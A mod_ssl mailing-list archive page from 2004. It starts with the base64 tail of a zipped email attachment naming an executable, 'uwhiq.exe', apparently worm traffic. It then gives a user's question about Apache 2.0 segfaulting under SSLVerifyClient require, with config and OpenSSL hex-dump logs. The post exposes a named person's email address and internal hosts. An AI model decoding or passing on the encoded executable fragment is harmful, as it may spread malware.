YxXqza9f4Yt9tAZQlsCP58UEPpooSTDBr3ryXUySBMXfP7UOohtP8tNg459SVmJ4V/XL0NV4
j8IQ9cO63RYwKaIpRCG4YZ7DjpCTItYBRGvSrJogdNp7gOLNSeZRcuuN6gzhuBpeolwONz+H
Vsdynj5TXcPDx3eNipcoyus9LXPd/IXQZa9UasmJtBmF0tupfMp0VkJjLAsT1OerSsT+TXkB
yvQejZF/Kt7E/nRXMdYXD/vCZn2KYegkUxFb/0YWKcteYj2q0k7N29S5K9IPE9gKNxcDk9Fo
xBedhUbULRJpDlTengD6w7C+S2noBilsjYMoywXDvQbVKF0fhY4b28LS7OQ36prSTe3pjVIY
A7PYugC7erug+SZn4rP1SEyjMWFs4S+BhbqtiGigM3Lgm1aaxyKvuUzdZ5iXUsImWzKpCppb
Cbxz9v7WDCL+s35DOKhlVkVgAXpHw+txVfVD7AusYN3GVTKMwmrXRh9mDy2LqhyQpJQL3EAP
JMkLtQ9AzEZ8ay4xVR+brqL4YP6aH0O42QpZBIv1omk2yvKfNpK5AcwKvz6K9BVrnyU6GZBY
rKXi+DzE21lR4eJoU/JdGZCEz2EJcKjdY84Fdoc4kmwQWPQrEi74nfk5nhSxsAlIxfvcUEsB
AhQACgABAAAAoGZkMHMqxxV4UQAAbFEAAAkAAAAAAAAAAQAgAAAAAAAAAHV3aGlxLmV4ZVBL
BQYAAAAAAQABADcAAACfUQAAAAA=

----------nwpmosppwjqenstmvlal--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar  4 13:07:18 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E27F1A8AA9; Thu,  4 Mar 2004 13:07:17 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.tcmb.gov.tr (mail.tcmb.gov.tr [213.139.239.100])
	by master.modssl.org (Postfix) with ESMTP id 046F1A8AA3
	for ; Thu,  4 Mar 2004 13:07:05 +0100 (CET)
Received: (qmail 6160 invoked by uid 0); 4 Mar 2004 12:06:59 -0000
Received: from Mahmut.Eren@tcmb.gov.tr by idmsmail2.tcmb.gov.tr with virus-scanner(Clean); 04 Mar 2004 12:06:59 -0000
Received: from idmsmail1.tcmb.gov.tr ([10.5.0.212]) (envelope-sender )
          by idmsmail2.tcmb.gov.tr (qmail-ldap-1.03) with SMTP
          for ; 4 Mar 2004 12:06:54 -0000
Received: by idmsmail1.tcmb.gov.tr with Internet Mail Service (5.5.2653.19)
	id ; Thu, 4 Mar 2004 14:06:55 +0200
Message-ID: <00BAC1E9C896D411A46100508B137C3C0C74D5FD@idmsmail1.tcmb.gov.tr>
From: Mahmut Eren 
To: modssl-users@modssl.org
Subject: problem with SSLVerifyClient required in apache 2.0
Date: Thu, 4 Mar 2004 14:06:53 +0200 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="ISO-8859-9"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mahmut Eren 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,
My system configuration is as follows:
Mandrake 9.2
Apache 2.0.47 
apache2-mod_ssl 2.0.47 
OpenSSL 0.9.7b 

I want to authenticate my clients with certificates. Here is apache-ssl configuration:
DocumentRoot "/var/www/html"
ErrorLog logs/ssl_error_log

TransferLog logs/ssl_access_log

SSLEngine on
SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
SSLCertificateFile /etc/ssl/apache/download_sapslnt2.tcmb.gov.tr.crt
SSLCertificateKeyFile /etc/ssl/apache/server_openca91.key
SSLCertificateChainFile /etc/ssl/apache/cacert.pem
SSLCACertificateFile /etc/ssl/apache/cacert.pem
SSLCARevocationFile /etc/ssl/apache/cacrl.crl
SSLVerifyClient require
SSLVerifyDepth 1

    SSLOptions +StdEnvVars


    SSLOptions +StdEnvVars


    SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown \
    downgrade-1.0 force-response-1.0


CustomLog logs/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"


RewriteEngine On
RewriteOptions inherit


If I turn off the SSLVerifyClient parameter everything works fine. But 
when I turn on SSLVerifyClient as "SSLVerifyClient require" , the client (IE,mozilla) can not connect to server.
and apache logs the following for every attempt: 
   [Wed Mar 03 12:57:37 2004] [notice] child pid 22462 exit signal Segmentation fault (11)
I made the log level debug and get the following lines in ssl-error log file. Any help will be appreciated. 

thanks
Mahmut Eren

btw: it works in apache 1.3.23 with the same client certificate.

ssl-error log
______________
[Wed Mar 03 13:06:18 2004] [info] Connection to child 0 established (server sapslnt2.tcmb.gov.tr:443, client 10.5.54.91)
[Wed Mar 03 13:06:18 2004] [info] Seeding PRNG with 136 bytes of entropy
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_kernel.c(1766): OpenSSL: Handshake: start
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_kernel.c(1774): OpenSSL: Loop: before/accept initialization
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_io.c(1484): OpenSSL: read 11/11 bytes from BIO#82e1738 [mem: 82d2530] (BIO dump follows)
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_io.c(1431): +-------------------------------------------------------------------------+
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_io.c(1456): | 0000: 80 4c 01 03 00 00 33 00-00 00 10                 .L....3....      |
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_io.c(1462): +-------------------------------------------------------------------------+
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_io.c(1484): OpenSSL: read 67/67 bytes from BIO#82e1738 [mem: 82d253b] (BIO dump follows)
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_io.c(1431): +-------------------------------------------------------------------------+
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_io.c(1456): | 0000: 00 00 04 00 00 05 00 00-0a 01 00 80 07 00 c0 03  ................ |
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_io.c(1456): | 0010: 00 80 00 00 09 06 00 40-00 00 64 00 00 62 00 00  .......@..d..b.. |
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_io.c(1456): | 0020: 03 00 00 06 02 00 80 04-00 80 00 00 13 00 00 12  ................ |
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_io.c(1456): | 0030: 00 00 63 d2 6c 7d f0 59-be 40 5e fa a3 76 c0 10  ..c.l}.Y.@^..v.. |
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_io.c(1456): | 0040: 12 09 02                                         ...              |
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_io.c(1462): +-------------------------------------------------------------------------+
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_kernel.c(1774): OpenSSL: Loop: SSLv3 read client hello A
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_kernel.c(1774): OpenSSL: Loop: SSLv3 write server hello A
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_kernel.c(1774): OpenSSL: Loop: SSLv3 write certificate A
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_kernel.c(1774): OpenSSL: Loop: SSLv3 write certificate request A
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_kernel.c(1774): OpenSSL: Loop: SSLv3 flush data
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_io.c(1495): OpenSSL: I/O error, 5 bytes expected to read on BIO#82e1738 [mem: 82d2530]
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_kernel.c(1803): OpenSSL: Exit: error in SSLv3 read client certificate A
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_kernel.c(1803): OpenSSL: Exit: error in SSLv3 read client certificate A
[Wed Mar 03 13:06:18 2004] [info] (70014)End of file found: SSL handshake interrupted by system [Hint: Stop button pressed in browser?!]
[Wed Mar 03 13:06:18 2004] [info] Connection to child 0 closed with abortive shutdown(server sapslnt2.tcmb.gov.tr:443, client 10.5.54.91)
[Wed Mar 03 13:06:20 2004] [info] Connection to child 6 established (server sapslnt2.tcmb.gov.tr:443, client 10.5.54.91)
[Wed Mar 03 13:06:20 2004] [info] Seeding PRNG with 136 bytes of entropy
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_kernel.c(1766): OpenSSL: Handshake: start
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_kernel.c(1774): OpenSSL: Loop: before/accept initialization
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1484): OpenSSL: read 11/11 bytes from BIO#82caf80 [mem: 82d2610] (BIO dump follows)
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1431): +-------------------------------------------------------------------------+
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0000: 80 4c 01 03 00 00 33 00-00 00 10                 .L....3....      |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1462): +-------------------------------------------------------------------------+
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1484): OpenSSL: read 67/67 bytes from BIO#82caf80 [mem: 82d261b] (BIO dump follows)
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1431): +-------------------------------------------------------------------------+
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0000: 00 00 04 00 00 05 00 00-0a 01 00 80 07 00 c0 03  ................ |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0010: 00 80 00 00 09 06 00 40-00 00 64 00 00 62 00 00  .......@..d..b.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0020: 03 00 00 06 02 00 80 04-00 80 00 00 13 00 00 12  ................ |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0030: 00 00 63 38 ab 18 16 8f-3b b4 c2 c1 8f a1 9a cd  ..c8....;....... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0040: d3 54 ac                                         .T.              |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1462): +-------------------------------------------------------------------------+
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_kernel.c(1774): OpenSSL: Loop: SSLv3 read client hello A
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_kernel.c(1774): OpenSSL: Loop: SSLv3 write server hello A
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_kernel.c(1774): OpenSSL: Loop: SSLv3 write certificate A
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_kernel.c(1774): OpenSSL: Loop: SSLv3 write certificate request A
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_kernel.c(1774): OpenSSL: Loop: SSLv3 flush data
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1484): OpenSSL: read 5/5 bytes from BIO#82caf80 [mem: 82d2610] (BIO dump follows)
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1431): +-------------------------------------------------------------------------+
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0000: 16 03 00 06 09                                   .....            |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1462): +-------------------------------------------------------------------------+
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1484): OpenSSL: read 1455/1545 bytes from BIO#82caf80 [mem: 82d2615] (BIO dump follows)
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1431): +-------------------------------------------------------------------------+
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0000: 0b 00 04 fb 00 04 f8 00-04 f5 30 82 04 f1 30 82  ..........0...0. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0010: 03 d9 a0 03 02 01 02 02-01 08 30 0d 06 09 2a 86  ..........0...*. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0020: 48 86 f7 0d 01 01 05 05-00 30 63 31 0b 30 09 06  H........0c1.0.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0030: 03 55 04 06 13 02 54 52-31 0d 30 0b 06 03 55 04  .U....TR1.0...U. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0040: 0a 13 04 54 63 6d 62 31-0d 30 0b 06 03 55 04 0b  ...Tcmb1.0...U.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0050: 13 04 53 61 70 6d 31 10-30 0e 06 03 55 04 03 13  ..Sapm1.0...U... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0060: 07 42 49 47 4d 20 43 41-31 24 30 22 06 09 2a 86  .BIGM CA1$0"..*. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0070: 48 86 f7 0d 01 09 01 16-15 77 65 62 6d 61 73 74  H........webmast |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0080: 65 72 40 74 63 6d 62 2e-67 6f 76 2e 74 72 30 1e  er@tcmb.gov.tr0. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0090: 17 0d 30 34 30 33 30 31-31 35 33 38 30 31 5a 17  ..040301153801Z. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 00a0: 0d 30 35 30 33 30 31 31-35 33 38 30 31 5a 30 5e  .050301153801Z0^ |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 00b0: 31 0b 30 09 06 03 55 04-06 13 02 74 72 31 0d 30  1.0...U....tr1.0 |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 00c0: 0b 06 03 55 04 0a 13 04-74 63 6d 62 31 11 30 0f  ...U....tcmb1.0. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 00d0: 06 03 55 04 0b 13 08 49-6e 74 65 72 6e 65 74 31  ..U....Internet1 |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 00e0: 21 30 1f 06 03 55 04 03-13 18 4d 61 68 6d 75 74  !0...U....Mahmut |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 00f0: 20 45 52 45 4e 20 28 43-41 20 30 39 31 29 53 53   EREN (CA 091)SS |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0100: 4b 47 31 0a 30 08 06 03-55 04 05 13 01 38 30 81  KG1.0...U....80. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0110: 9f 30 0d 06 09 2a 86 48-86 f7 0d 01 01 01 05 00  .0...*.H........ |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0120: 03 81 8d 00 30 81 89 02-81 81 00 b0 10 dc 32 db  ....0.........2. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0130: f4 16 6e 52 6e 2f 65 a0-96 81 f2 eb cb f4 1c a2  ..nRn/e......... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0140: 5d 3b 0f 86 ed 26 fa 46-02 e6 97 50 ab 58 15 67  ];...&.F...P.X.g |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0150: 9e c8 ab ed b0 b3 6a 2a-86 8e 45 15 4b 0f f0 10  ......j*..E.K... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0160: 46 ea 51 32 f4 ab f4 48-b3 39 b5 a8 2c 0b 7a f1  F.Q2...H.9..,.z. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0170: 30 4d 86 5b 03 5e 9d e2-ed f5 e9 26 ec 37 ba 7e  0M.[.^.....&.7.~ |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0180: 95 8b a4 9f 15 7f 64 11-48 ee ca e9 a8 43 aa 4e  ......d.H....C.N |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0190: 88 b7 95 e3 8f 5d fa 3d-91 79 2e 4b 43 14 a3 29  .....].=.y.KC..) |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 01a0: 8b 57 c2 fd 02 37 f6 f8-01 fe 8d 02 03 01 00 01  .W...7.......... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 01b0: a3 82 02 37 30 82 02 33-30 09 06 03 55 1d 13 04  ...70..30...U... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 01c0: 02 30 00 30 11 06 09 60-86 48 01 86 f8 42 01 01  .0.0...`.H...B.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 01d0: 04 04 03 02 05 a0 30 0b-06 03 55 1d 0f 04 04 03  ......0...U..... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 01e0: 02 05 e0 30 29 06 03 55-1d 25 04 22 30 20 06 08  ...0)..U.%."0 .. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 01f0: 2b 06 01 05 05 07 03 02-06 08 2b 06 01 05 05 07  +.........+..... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0200: 03 04 06 0a 2b 06 01 04-01 82 37 14 02 02 30 27  ....+.....7...0' |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0210: 06 09 60 86 48 01 86 f8-42 01 0d 04 1a 16 18 55  ..`.H...B......U |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0220: 73 65 72 20 43 65 72 74-69 66 69 63 61 74 65 20  ser Certificate  |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0230: 6f 66 20 74 63 6d 62 30-1d 06 03 55 1d 0e 04 16  of tcmb0...U.... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0240: 04 14 60 59 09 51 ff 43-ef a7 8e d0 df 0b 58 e5  ..`Y.Q.C......X. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0250: c5 06 c1 0d 7b 55 30 81-8d 06 03 55 1d 23 04 81  ....{U0....U.#.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0260: 85 30 81 82 80 14 d7 d6-10 11 17 ad 89 59 4f ec  .0...........YO. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0270: 01 a5 b0 3d 49 9b e8 f0-cc c1 a1 67 a4 65 30 63  ...=I......g.e0c |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0280: 31 0b 30 09 06 03 55 04-06 13 02 54 52 31 0d 30  1.0...U....TR1.0 |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0290: 0b 06 03 55 04 0a 13 04-54 63 6d 62 31 0d 30 0b  ...U....Tcmb1.0. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 02a0: 06 03 55 04 0b 13 04 53-61 70 6d 31 10 30 0e 06  ..U....Sapm1.0.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 02b0: 03 55 04 03 13 07 42 49-47 4d 20 43 41 31 24 30  .U....BIGM CA1$0 |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 02c0: 22 06 09 2a 86 48 86 f7-0d 01 09 01 16 15 77 65  "..*.H........we |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 02d0: 62 6d 61 73 74 65 72 40-74 63 6d 62 2e 67 6f 76  bmaster@tcmb.gov |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 02e0: 2e 74 72 82 01 00 30 22-06 03 55 1d 11 04 1b 30  .tr...0"..U....0 |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 02f0: 19 81 17 6d 61 68 6d 75-74 2e 65 72 65 6e 40 74  ...mahmut.eren@t |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0300: 63 6d 62 2e 67 6f 76 2e-74 72 30 20 06 03 55 1d  cmb.gov.tr0 ..U. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0310: 12 04 19 30 17 81 15 77-65 62 6d 61 73 74 65 72  ...0...webmaster |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0320: 40 74 63 6d 62 2e 67 6f-76 2e 74 72 30 3d 06 09  @tcmb.gov.tr0=.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0330: 60 86 48 01 86 f8 42 01-04 04 30 16 2e 68 74 74  `.H...B...0..htt |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0340: 70 73 3a 2f 2f 73 61 70-73 6c 6e 74 32 2e 74 63  ps://sapslnt2.tc |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0350: 6d 62 2e 67 6f 76 2e 74-72 2f 70 75 62 2f 63 72  mb.gov.tr/pub/cr |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0360: 6c 2f 63 61 63 72 6c 2e-63 72 6c 30 3d 06 09 60  l/cacrl.crl0=..` |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0370: 86 48 01 86 f8 42 01 03-04 30 16 2e 68 74 74 70  .H...B...0..http |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0380: 73 3a 2f 2f 73 61 70 73-6c 6e 74 32 2e 74 63 6d  s://sapslnt2.tcm |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0390: 62 2e 67 6f 76 2e 74 72-2f 70 75 62 2f 63 72 6c  b.gov.tr/pub/crl |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 03a0: 2f 63 61 63 72 6c 2e 63-72 6c 30 3f 06 03 55 1d  /cacrl.crl0?..U. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 03b0: 1f 04 38 30 36 30 34 a0-32 a0 30 86 2e 68 74 74  ..80604.2.0..htt |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 03c0: 70 73 3a 2f 2f 73 61 70-73 6c 6e 74 32 2e 74 63  ps://sapslnt2.tc |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 03d0: 6d 62 2e 67 6f 76 2e 74-72 2f 70 75 62 2f 63 72  mb.gov.tr/pub/cr |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 03e0: 6c 2f 63 61 63 72 6c 2e-63 72 6c 30 0d 06 09 2a  l/cacrl.crl0...* |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 03f0: 86 48 86 f7 0d 01 01 05-05 00 03 82 01 01 00 3c  .H.............< |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0400: f8 d6 ef d1 bc 38 ab 94-da cf 5a d8 56 1e 31 33  .....8....Z.V.13 |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0410: 77 09 ca c4 ad 41 1a 09-7d 62 84 85 e5 5a 65 3c  w....A..}b...Ze< |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0420: ec d4 62 9b 7c de e3 d9-72 b6 da e7 b7 35 1b f8  ..b.|...r....5.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0430: f8 aa 64 96 f1 2d 15 18-64 64 1f b2 f0 24 2a 93  ..d..-..dd...$*. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0440: 8b c2 dc cf 96 e9 78 f9-ab 7d 9e a8 e4 e7 82 0a  ......x..}...... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0450: 35 11 7c ed c6 0a 96 02-c4 5c 42 71 5a 54 eb 82  5.|......\BqZT.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0460: c2 81 40 9f 7f b6 ab a0-ad 74 c6 ff 14 47 f7 81  ..@......t...G.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0470: 8c cc 55 48 ce 68 be 8f-94 27 7c c4 62 33 87 00  ..UH.h...'|.b3.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0480: 1c 6d 74 8d ab f8 af 33-28 6e cb 0e dc 0d 5e ee  .mt....3(n....^. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0490: 8e 5d bd 0d 2a 3d 6a 35-3e f3 a0 c2 00 c0 cd 44  .]..*=j5>......D |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 04a0: 54 d9 06 4a 05 6c 06 ec-2b cc 4e d3 1d b6 9f a7  T..J.l..+.N..... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 04b0: e3 a2 60 35 2d 6c ce 95-92 bc 25 bc e9 ee 99 ba  ..`5-l....%..... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 04c0: 0f 6a b5 ad 64 9a 09 52-5f 23 8e 1e 2c 31 62 92  .j..d..R_#..,1b. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 04d0: 90 99 f9 20 db 41 92 d7-b7 11 cd eb 56 ab b9 11  ... .A......V... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 04e0: c1 e5 09 ef 64 08 df df-47 a0 05 03 07 7e e6 e8  ....d...G....~.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 04f0: 0e fc 41 19 61 d4 0a 57-1d 84 dd a8 79 f1 54 10  ..A.a..W....y.T. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0500: 00 00 80 21 64 f3 63 60-cf c2 ed 75 81 32 28 ad  ...!d.c`...u.2(. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0510: 27 d5 2a 1f 22 f6 7f a0-85 cf af 37 78 aa 33 8d  '.*."......7x.3. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0520: 96 71 1c 44 09 85 ac 0a-12 89 46 6d 7f ac 75 a6  .q.D......Fm..u. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0530: 8f bf 3e cb 9f 51 d1 bc-89 55 3e 2c d9 2d b6 e2  ..>..Q...U>,.-.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0540: 53 e6 62 22 cf 5f 94 0d-ab 2c 05 78 8a 2d 37 de  S.b"._...,.x.-7. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0550: da c3 4c 36 9d 93 ea 40-a7 88 7c f6 26 13 78 d3  ..L6...@..|.&.x. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0560: a8 6d 99 54 44 74 de 46-30 af a2 f5 06 62 e8 ee  .m.TDt.F0....b.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0570: a4 18 38 1d 94 b3 ba b0-5c 2f 2a 61 75 7f b1 81  ..8.....\/*au... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0580: da 65 2f 0f 00 00 82 00-80 6c 81 38 0a b3 7d e8  .e/......l.8..}. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0590: 99 70 fb 47 db 27 de ea-f2 5d d4 c2 d8 16 dd c5  .p.G.'...]...... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 05a0: 48 95 1a d7 16 ad 9c 91-1d dc 1a 6d 9b 98 e9     H..........m...  |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1462): +-------------------------------------------------------------------------+
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1484): OpenSSL: read 90/90 bytes from BIO#82caf80 [mem: 82d2bc4] (BIO dump follows)
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1431): +-------------------------------------------------------------------------+
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0000: 00 32 7b e7 79 91 cb d7-45 f0 54 a7 d9 8b 9d 4a  .2{.y...E.T....J |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0010: 29 c6 eb 7b 8c 4f 6d 63-87 06 f3 43 e1 d3 79 ee  )..{.Omc...C..y. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0020: 98 39 bb 71 ef 17 be 4a-93 3a 93 1d b0 4a 2b f0  .9.q...J.:...J+. |
